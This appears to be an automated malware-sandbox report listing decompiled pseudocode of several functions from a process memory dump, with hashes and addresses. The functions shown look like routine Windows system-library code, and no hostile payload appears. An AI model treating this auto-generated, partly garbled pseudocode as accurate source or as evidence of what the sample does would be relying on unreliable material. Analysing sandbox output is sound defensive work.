Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: e4b0da4cbf7b0718a334645f461fa6598bf862be16b3b5f68ff9d094209895ec
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: C801AC32710129AFD720EE5EDD41E5B77ADFB88760F140528BA08CB254EA30FD01D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0467C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0467C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04629910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E046295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E046295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E046295D0();
				return L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0467c458
0x0467c45d
0x0467c466
0x0467c468
0x0467c469
0x0467c46a
0x0467c46b
0x0467c46e
0x0467c46f
0x0467c471
0x0467c476
0x0467c476
0x0467c47c
0x0467c47e
0x0467c480
0x0467c480
0x0467c483
0x0467c484
0x0467c486
0x0467c488
0x0467c48f
0x0467c491
0x0467c493
0x0467c493
0x0467c48f
0x0467c498
0x0467c49e
0x0467c4ad
0x0467c4ad
0x0467c4b2
0x0467c4b4
0x0467c4cd

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: b64ccd8de4d8a29bbe0930579dde218e18ffb940607adab4db4e990fe8105ede
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: C80196B1280A15BFE715AF65CD80E62FB6DFF94395F004529F11452664E721BCA0CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 045E9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E045E9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x46d85ec;
				E04602280(_t48, 0x46d85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E045FFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x46d538c; // 0x774968c8
					if( *_t84 != 0x46d5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x46bf6e8);
						E0463D0E8(0x46d85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E046B88F5(_t80, _t85, 0x46d5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x46d86c0; // 0xa007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x46d86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04602280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E046B88F5(0x46d85ec, _t85, 0x46d5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0462AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x46db1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x46d84c0;
																			if(_t82 >=  *0x46d84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E046B9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E045E922A(_t99);
										_t64 = E04607D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E046B8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x46d86c0; // 0xa007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x46d86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x46d86bc;
													_t87 = 0x46d86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E045E9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x46d86c4;
												_t87 = 0x46d86c0;
												L27:
												E04619B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0463D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x46d5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x46d538c = _t51;
						goto L6;
					}
				}
			}

0x045e9082
0x045e9083
0x045e9084
0x045e9085
0x045e9087
0x045e9096
0x045e9098
0x045e9098
0x045e909e
0x045e90a8
0x045e90e7
0x045e90e7
0x045e90aa
0x045e90b0
0x045e90b7
0x045e90bd
0x045e90dd
0x045e90e6
0x045e90bf
0x045e90bf
0x045e90c7
0x045e90cf
0x045e90f1
0x045e90f2
0x045e90f4
0x045e90f5
0x045e90f6
0x045e90f7
0x045e90f8
0x045e90f9
0x045e90fa
0x045e90fb
0x045e90fc
0x045e90fd
0x045e90fe
0x045e90ff
0x045e9100
0x045e9102
0x045e9107
0x045e910c
0x045e9110
0x045e9113
0x045e9115
0x045e9136
0x045e913f
0x045e9143
0x046437e4
0x046437e4
0x045e9117
0x045e9117
0x045e911d
0x00000000
0x045e911f
0x045e911f
0x045e9125
0x00000000
0x045e9127
0x045e912d
0x045e9130
0x045e9134
0x045e9158
0x045e915d
0x045e9161
0x045e9168
0x04643715
0x045e916e
0x045e916e
0x045e9175
0x045e9177
0x045e917e
0x045e917f
0x045e9182
0x045e9182
0x045e9187
0x045e9187
0x045e918a
0x045e918d
0x045e918f
0x045e9192
0x045e9195
0x045e9198
0x045e9198
0x045e9198
0x045e919a
0x00000000
0x00000000
0x0464371f
0x04643721
0x04643727
0x0464372f
0x04643733
0x04643735
0x04643738
0x0464373b
0x0464373d
0x04643740
0x00000000
0x04643746
0x04643746
0x04643749
0x00000000
0x0464374f
0x0464374f
0x04643751
0x04643757
0x04643759
0x0464375c
0x0464375c
0x0464375e
0x0464375e
0x04643761
0x04643764
0x00000000
0x00000000
0x04643766
0x04643768
0x046437a3
0x046437a3
0x046437a5
0x046437a7
0x046437ad
0x046437b0
0x046437b2
0x046437bc
0x046437c2
0x046437c2
0x046437b2
0x045e9187
0x045e9187
0x045e918a
0x045e918d
0x045e918f
0x045e9192
0x045e9195
0x00000000
0x045e9195
0x00000000
0x0464376a
0x0464376a
0x0464376a
0x0464376c
0x0464376c
0x0464376f
0x04643775
0x00000000
0x00000000
0x04643777
0x04643779
0x04643782
0x04643787
0x04643789
0x04643790
0x04643790
0x0464378b
0x0464378b
0x0464378b
0x04643792
0x04643795
0x00000000
0x04643795
0x00000000
0x04643779
0x04643798
0x00000000
0x04643798
0x00000000
0x04643768
0x0464379b
0x0464379b
0x04643751
0x04643749
0x00000000
0x04643740
0x045e91a0
0x045e91a3
0x045e91a9
0x045e91b0
0x00000000
0x045e91b0
0x045e9187
0x045e91b4
0x045e91b4
0x045e91bb
0x045e91c0
0x045e91c5
0x045e91c7
0x046437da
0x045e91cd
0x045e91cd
0x045e91cd
0x045e91d2
0x045e91d5
0x045e9239
0x045e9239
0x045e91d7
0x045e91db
0x045e91e1
0x045e91e7
0x045e91fd
0x045e9203
0x045e921e
0x045e9223
0x00000000
0x045e9205
0x045e9205
0x045e9208
0x045e920c
0x045e9214
0x045e9214
0x045e920c
0x045e91e9
0x045e91e9
0x045e91ee
0x045e91f3
0x045e91f3
0x045e91f3
0x045e91e7
0x00000000
0x00000000
0x00000000
0x045e9134
0x045e9125
0x045e911d
0x045e914e
0x045e90d1
0x045e90d1
0x045e90d3
0x045e90d6
0x045e90d8
0x00000000
0x045e90d8
0x045e90cf

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51c92c7c61c96740ec392016181cf136c66ed78faaad9d2e5666f64bc86ce34
Instruction ID: eff379f1517b60757e17cca1c58267d0ca68809ae6d14b7d248c7483b0dfdbcf
Opcode Fuzzy Hash: f51c92c7c61c96740ec392016181cf136c66ed78faaad9d2e5666f64bc86ce34
Instruction Fuzzy Hash: 0E0128B2A022009FE3199F09E840B227BB9FF81324F62406AE101DBB91E374FC41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 046B4015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E046B4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04602280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04602280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46d86ac);
					E045EF900(0x46d86d4, _t28);
					E045FFFB0(0x46d86ac, _t28, 0x46d86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E045FFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x046b401a
0x046b401e
0x046b4023
0x046b4028
0x046b4029
0x046b402b
0x046b402f
0x046b4043
0x046b4046
0x046b4051
0x046b4057
0x046b405f
0x046b4062
0x046b4067
0x046b406f
0x046b407c
0x046b407c
0x046b408c
0x046b408c
0x046b4097

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251a6098a8a461fa91eca9214d49bd289747756f3ad2f2ff82db926b6994b757
Instruction ID: c4bb2a9968faadb8b25a473a1b8fd1057b69e80a4825d03e2ef6367711cbd918
Opcode Fuzzy Hash: 251a6098a8a461fa91eca9214d49bd289747756f3ad2f2ff82db926b6994b757
Instruction Fuzzy Hash: 240184726419457FE215AF69CD84E53B7ACFF85668B000629F60883A52EB24FC51C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 046A14FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E046A14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0462FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04607D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0462B640(E04629AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046a14fb
0x046a14fb
0x046a150a
0x046a1514
0x046a1519
0x046a151b
0x046a1526
0x046a152c
0x046a1534
0x046a1537
0x046a153a
0x046a1545
0x046a1557
0x046a1547
0x046a1550
0x046a1550
0x046a1562
0x046a1563
0x046a1565
0x046a156a
0x046a157f

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7a5961ababae216e3671866fef4d1e6ea9aa2672497af78e4a9be9fe4936f5
Instruction ID: 1c642d2049e371ce1e34165f40742bc57345b83020087afc64c24b5a645b943b
Opcode Fuzzy Hash: 3b7a5961ababae216e3671866fef4d1e6ea9aa2672497af78e4a9be9fe4936f5
Instruction Fuzzy Hash: 48019271A01658BFDB14DF68D942EAEB7B8EF45710F00406AF904EB380E674EE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046A138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E046A138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0462FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04607D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0462B640(E04629AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046a138a
0x046a138a
0x046a1399
0x046a13a3
0x046a13a8
0x046a13aa
0x046a13b5
0x046a13bb
0x046a13c3
0x046a13c6
0x046a13c9
0x046a13d4
0x046a13e6
0x046a13d6
0x046a13df
0x046a13df
0x046a13f1
0x046a13f2
0x046a13f4
0x046a13f9
0x046a140e

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b72d8ff7332f43cef9f38cddae3064c3c3973cdd256de3d0ddaf2d313cc18c
Instruction ID: 5e55ab6028dc536892e9983f901fb68c43d274934694bfeface6dd7115210dbc
Opcode Fuzzy Hash: 74b72d8ff7332f43cef9f38cddae3064c3c3973cdd256de3d0ddaf2d313cc18c
Instruction Fuzzy Hash: 34015271E01618BFDB14DFA9D942EAEB7B8EF45710F00406AB904EB380E674AE11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 045E58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E045E58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x46dd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x45c5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E045E5943() != 0 &&  *0x46d5320 > 5) {
					E04667B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04667B5E( &_v28, _t28);
					_t11 = E04667B9C(0x46d5320, 0x45cbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0462B640(_t11, _t17, _v8 ^ _t29, 0x45cbf15, _t27, _t28);
			}

0x045e58fb
0x045e58fe
0x045e5906
0x045e590a
0x045e593c
0x045e593c
0x045e590c
0x045e590c
0x045e5911
0x00000000
0x045e5913
0x045e5913
0x045e5913
0x045e5911
0x045e591d
0x04641035
0x0464103c
0x0464103f
0x04641056
0x04641056
0x045e593b

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4786605935e833186bc6994631f38d6536ae1f7ac054b507954b060fb2948399
Instruction ID: c679f8e4d736ed3def50ed7f3ee886c04ad71e731b287b2c9da94059623b0b1f
Opcode Fuzzy Hash: 4786605935e833186bc6994631f38d6536ae1f7ac054b507954b060fb2948399
Instruction Fuzzy Hash: 3E018831B00518BBE718DEA5E8009FE77ACFB41628F9500699A06D7640FE20FD01D694

Uniqueness

Uniqueness Score: -1.00%

Function 0469FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0469FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0462FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04607D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0462B640(E04629AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0469fe3f
0x0469fe3f
0x0469fe4e
0x0469fe58
0x0469fe5d
0x0469fe5f
0x0469fe6a
0x0469fe72
0x0469fe75
0x0469fe78
0x0469fe83
0x0469fe95
0x0469fe85
0x0469fe8e
0x0469fe8e
0x0469fea0
0x0469fea1
0x0469fea3
0x0469fea8
0x0469febd

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1a4661e3d65a3cb8a911e3ed2f730529307b8ff0a40d19f784de586a3162e5
Instruction ID: da93e5609382da54d888d9ddd59978d7356022845b177f80c077aa10641895bf
Opcode Fuzzy Hash: ae1a4661e3d65a3cb8a911e3ed2f730529307b8ff0a40d19f784de586a3162e5
Instruction Fuzzy Hash: EC018871E01219BBDB14DF69D845FAEB7B8EF44714F00406AB900DB381E974A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0469FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0469FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0462FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04607D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0462B640(E04629AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0469fec0
0x0469fec0
0x0469fecf
0x0469fed9
0x0469fede
0x0469fee0
0x0469feeb
0x0469fef3
0x0469fef6
0x0469fef9
0x0469ff04
0x0469ff16
0x0469ff06
0x0469ff0f
0x0469ff0f
0x0469ff21
0x0469ff22
0x0469ff24
0x0469ff29
0x0469ff3e

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60245504424caebff84adc0b45e4fc2fdf1249a59501479597980d742b1633f
Instruction ID: ee127d7e012ef2be2da7eb2b2be325ac0199f1247f5de71f23c3acc87fc8f0a5
Opcode Fuzzy Hash: e60245504424caebff84adc0b45e4fc2fdf1249a59501479597980d742b1633f
Instruction Fuzzy Hash: 4C017571E01618BBDB14DF69D945AAEB7B8EB45704F00406AB900DB280E974AA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046B1074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046B1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E046B165E(__ebx, 0x46d8ae4, (__edx -  *0x46d8b04 >> 0x14) + (__edx -  *0x46d8b04 >> 0x14), __edi, __ecx, (__edx -  *0x46d8b04 >> 0x14) + (__edx -  *0x46d8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E046AAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04607D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0469FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x046b1074
0x046b1080
0x046b1082
0x046b108a
0x046b108f
0x046b1093
0x046b10ab
0x046b10ab
0x046b10c3
0x046b10cf
0x046b10e1
0x046b10d1
